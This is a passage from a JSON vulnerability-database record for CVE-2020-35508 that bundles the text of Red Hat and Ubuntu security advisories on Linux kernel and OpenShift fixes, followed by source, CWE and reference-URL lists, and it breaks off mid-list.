v1\n\niQIVAwUBYKPwgNzjgjWX9erEAQiOVg//YfXIKUxc84y2aRexvrPHeTQvYkFMktq7\nNEhNhHqEZbDUabM5+eKb5hoyG44PmXvQuK1njYjEbpTjQss92U8fekGJZAR9Zbsl\nWEfVcu/ix/UJOzQj/lp+dKhirBSE/33xgBmSsQI6JQc+xn1AoZC8bOeSqyr7J6Y7\nt6I552Llhun9DDUGS8KYAM8PkrK3RGQybAS3S4atTdYd0qk42ZPF7/XqrbI7G4iq\n0Oe+ZePj6lN1O7pHV0WYUD2yzLTCZZopmz5847BLBEbGLqPyxlShZ+MFGsWxCOHk\ntW8lw/nqVt/MNlOXI1tD6P6iFZ6JQYrRU5mGFlvsl3t9NQW60MxmcUNPgtVknXW5\nBssBM/r6uLi0yFTTnDRZnv2MCs7fIzzqKXOHozrCvItswG6S8Qs72MaW2EQHAEen\nm7/fMKWTjt9CQudNCm/FwHLb8O9cYnOZwRiAINomo2B/Fi1b7WlquETSmjgQaQNr\nRxqtgiNQ98q92gnFgC8pCzxmiKRmHLFJEuxXYVq0O8Ch5i/eC8ExoO7Hqe6kYnJe\nZaST6fAtb2bMDcPdborfSIUmuDcYdKFtcEfCuuFZIbBxnL2aJDMw0zen/rmDNQyV\nlwwXoKanoP5EjKKFMc/zkeHlOInMzeHa/0DIlA9h3kpro5eGN0uOPZvsrlryjC+J\niJzkORGWplM\\xfb/D\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the latest RHEL-8.2.z10 Batch source\ntree (BZ#1968022)\n\n4. \n\nBug Fix(es):\n\n* RHEL8.2 Snapshot2 - tpm: ibmvtpm: Wait for buffer to be set before\nproceeding (BZ#1933986)\n\n* fnic crash from invalid request pointer (BZ#1961707)\n\n* [Azure][RHEL8.4] Two Patches Needed To Enable Azure Host Time-syncing in\nVMs (BZ#1963051)\n\n* RHEL kernel 8.2 and higher are affected by data corruption bug in raid1\narrays using bitmaps. (BZ#1969338)\n\n4. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.13. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2021:2122\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nThis update fixes the following bug among others:\n\n* Previously, resources for the ClusterOperator were being created early in\nthe update process, which led to update failures when the ClusterOperator\nhad no status condition while Operators were updating. This bug fix changes\nthe timing of when these resources are created. As a result, updates can\ntake place without errors. (BZ#1959238)\n\nSecurity Fix(es):\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-x86_64\n\nThe image digest is\nsha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4\n\n(For s390x architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-s390x\n\nThe image digest is\nsha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le\n\nThe image digest is\nsha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor\n\n3. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1923268 - [Assisted-4.7] [Staging] Using two both spelling \"canceled\" \"cancelled\"\n1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go\n1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list\n1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits\n1959238 - CVO creating cloud-controller-manager too early causing upgrade failures\n1960103 - SR-IOV obliviously reboot the node\n1961941 - Local Storage Operator using LocalVolume CR fails to create PV\u0027s when backend storage failure is simulated\n1962302 - packageserver clusteroperator does not set reason or message for Available condition\n1962312 - Deployment considered unhealthy despite being available and at latest generation\n1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone\n1963115 - Test verify /run filesystem contents failing\n\n5. ==========================================================================\nUbuntu Security Notice USN-4752-1\nFebruary 25, 2021\n\nlinux-oem-5.6 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-oem-5.6: Linux kernel for OEM systems\n\nDetails:\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered\nthat legacy pairing and secure-connections pairing authentication in the\nBluetooth protocol could allow an unauthenticated user to complete\nauthentication without pairing credentials via adjacent access. A\nphysically proximate attacker could use this to impersonate a previously\npaired Bluetooth device. (CVE-2020-10135)\n\nJay Shin discovered that the ext4 file system implementation in the Linux\nkernel did not properly handle directory access with broken indexing,\nleading to an out-of-bounds read vulnerability. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2020-14314)\n\nIt was discovered that the block layer implementation in the Linux kernel\ndid not properly perform reference counting in some situations, leading to\na use-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash). (CVE-2020-15436)\n\nIt was discovered that the serial port driver in the Linux kernel did not\nproperly initialize a pointer in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash). \n(CVE-2020-15437)\n\nAndy Nguyen discovered that the Bluetooth HCI event packet parser in the\nLinux kernel did not properly handle event advertisements of certain sizes,\nleading to a heap-based buffer overflow. A physically proximate remote\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2020-24490)\n\nIt was discovered that the NFS client implementation in the Linux kernel\ndid not properly perform bounds checking before copying security labels in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2020-25212)\n\nIt was discovered that the Rados block device (rbd) driver in the Linux\nkernel did not properly perform privilege checks for access to rbd devices\nin some situations. A local attacker could use this to map or unmap rbd\nblock devices. (CVE-2020-25284)\n\nIt was discovered that the block layer subsystem in the Linux kernel did\nnot properly handle zero-length requests. A local attacker could use this\nto cause a denial of service. (CVE-2020-25641)\n\nIt was discovered that the HDLC PPP implementation in the Linux kernel did\nnot properly validate input in some situations. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2020-25643)\n\nKiyin (\u5c39\u4eae) discovered that the perf subsystem in the Linux kernel did\nnot properly deallocate memory in some situations. A privileged attacker\ncould use this to cause a denial of service (kernel memory exhaustion). \n(CVE-2020-25704)\n\nIt was discovered that the KVM hypervisor in the Linux kernel did not\nproperly handle interrupts in certain situations. A local attacker in a\nguest VM could possibly use this to cause a denial of service (host system\ncrash). (CVE-2020-27152)\n\nIt was discovered that the jfs file system implementation in the Linux\nkernel contained an out-of-bounds read vulnerability. A local attacker\ncould use this to possibly cause a denial of service (system crash). \n(CVE-2020-27815)\n\nIt was discovered that an information leak existed in the syscall\nimplementation in the Linux kernel on 32 bit systems. A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2020-28588)\n\nIt was discovered that the framebuffer implementation in the Linux kernel\ndid not properly perform range checks in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). A local attacker could use\nthis to gain unintended write access to read-only memory pages. A local attacker could use this to cause a\ndenial of service (system crash) or possibly expose sensitive information. \n(CVE-2020-29369)\n\nJann Horn discovered that the romfs file system in the Linux kernel did not\nproperly validate file system meta-data, leading to an out-of-bounds read. \nAn attacker could use this to construct a malicious romfs image that, when\nmounted, exposed sensitive information (kernel memory). (CVE-2020-29371)\n\nJann Horn discovered that the tty subsystem of the Linux kernel did not use\nconsistent locking in some situations, leading to a read-after-free\nvulnerability. A local attacker could use this to cause a denial of service\n(system crash) or possibly expose sensitive information (kernel memory). \n(CVE-2020-29660)\n\nJann Horn discovered a race condition in the tty subsystem of the Linux\nkernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after-\nfree vulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. \n(CVE-2020-35508)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n linux-image-5.6.0-1048-oem 5.6.0-1048.52\n linux-image-oem-20.04 5.6.0.1048.44\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://usn.ubuntu.com/4752-1\n CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437,\n CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641,\n CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815,\n CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369,\n CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-35508"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "PACKETSTORM",
"id": "162654"
},
{
"db": "PACKETSTORM",
"id": "162626"
},
{
"db": "PACKETSTORM",
"id": "163584"
},
{
"db": "PACKETSTORM",
"id": "163589"
},
{
"db": "PACKETSTORM",
"id": "162877"
},
{
"db": "PACKETSTORM",
"id": "161556"
},
{
"db": "PACKETSTORM",
"id": "161555"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-35508",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "162626",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "161556",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163584",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021072252",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122404",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0717",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1820",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1866",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2439",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1688",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "161555",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "162654",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-377704",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-35508",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163589",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162877",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "PACKETSTORM",
"id": "162654"
},
{
"db": "PACKETSTORM",
"id": "162626"
},
{
"db": "PACKETSTORM",
"id": "163584"
},
{
"db": "PACKETSTORM",
"id": "163589"
},
{
"db": "PACKETSTORM",
"id": "162877"
},
{
"db": "PACKETSTORM",
"id": "161556"
},
{
"db": "PACKETSTORM",
"id": "161555"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"id": "VAR-202103-0287",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:38:32.343000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Linux\u00a0Kernel\u00a0Archives Red hat Red\u00a0Hat\u00a0Bugzilla",
"trust": 0.8,
"url": "https://github.com/torvalds/linux/commit/b4e00444cab4c3f3fec876dc0cccc8cbb0d1a948"
},
{
"title": "IBM: Security Bulletin: Vulnerabilities in the Linux Kernel, Samba, Sudo, Python, and tcmu-runner affect IBM Spectrum Protect Plus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ddbe78143bb073890c2ecb87b35850bf"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-362",
"trust": 1.1
},
{
"problemtype": "CWE-665",
"trust": 1.1
},
{
"problemtype": "Improper initialization (CWE-665) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35508"
},
{
"trust": 1.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1902724"
},
{
"trust": 1.8,
"url": "https://github.com/torvalds/linux/commit/b4e00444cab4c3f3fec876dc0cccc8cbb0d1a948"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20210513-0006/"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35508"
},
{
"trust": 0.7,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-the-linux-kernel-samba-sudo-python-and-tcmu-runner-affect-ibm-spectrum-protect-plus/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2021:1739"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2021:1578"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2021:2719"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2021:2718"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25704"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072252"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0717"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-privilege-escalation-via-signal-sending-34683"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1866"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1688"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1732"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1820"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2439"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162626/red-hat-security-advisory-2021-1578-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163584/red-hat-security-advisory-2021-2719-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161556/ubuntu-security-notice-usn-4752-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122404"
},
{
"trust": 0.5,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-25704"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-12114"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19528"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-12464"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14314"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25212"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25643"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19523"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-12362"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25284"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0431"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-25285"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12114"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-25212"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19523"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-28974"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14356"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-27835"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-15437"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-25284"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28974"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-27786"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27835"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14314"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-25643"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11608"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11608"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24394"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15437"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-0431"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-0342"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12464"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19528"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24394"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0342"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14356"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25285"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27786"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-18811"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18811"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33909"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-26541"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-006"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33034"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29661"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27815"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28588"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/665.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14347"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8286"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15586"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9951"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36242"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24977"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10878"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-16845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13584"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14360"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21645"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25659"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21643"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9983"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30465"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14345"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14344"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23336"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21644"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25039"
},
{
"trust": 0.1,
